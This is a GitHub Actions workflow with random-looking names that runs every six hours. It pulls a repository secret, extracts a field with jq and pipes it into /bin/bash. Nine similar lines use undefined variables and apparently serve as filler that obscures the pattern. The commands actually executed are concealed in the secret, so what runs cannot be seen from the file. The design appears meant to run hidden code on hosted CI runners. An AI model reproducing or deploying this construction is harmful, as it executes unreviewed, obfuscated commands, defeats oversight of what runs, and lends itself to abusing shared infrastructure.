name: xiaoguzaijiu
on:
  workflow_dispatch:
  schedule:
    - cron: '46 5/6 * * *'

jobs:  # 14329
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaoguzaijiu
        env:
          qppoy2: ${{ secrets.qppoy2 }}
        run: |
          echo $qppoy2 | jq -r .i549 | /bin/bash
          echo $q9 | jq -r .futc6 | /bin/bash
          echo $puu301 | jq -r .zf814 | /bin/bash
          echo $oya24 | jq -r .vitmx26 | /bin/bash
          echo $ekox32066 | jq -r .c09294 | /bin/bash
          echo $mlexh73 | jq -r .czzit6 | /bin/bash
          echo $vr5621 | jq -r .zwv9 | /bin/bash
          echo $bapuj0703 | jq -r .sbvf13 | /bin/bash
          echo $zf5 | jq -r .dcx06243 | /bin/bash
          echo $cwhk7368 | jq -r .hf31758 | /bin/bash

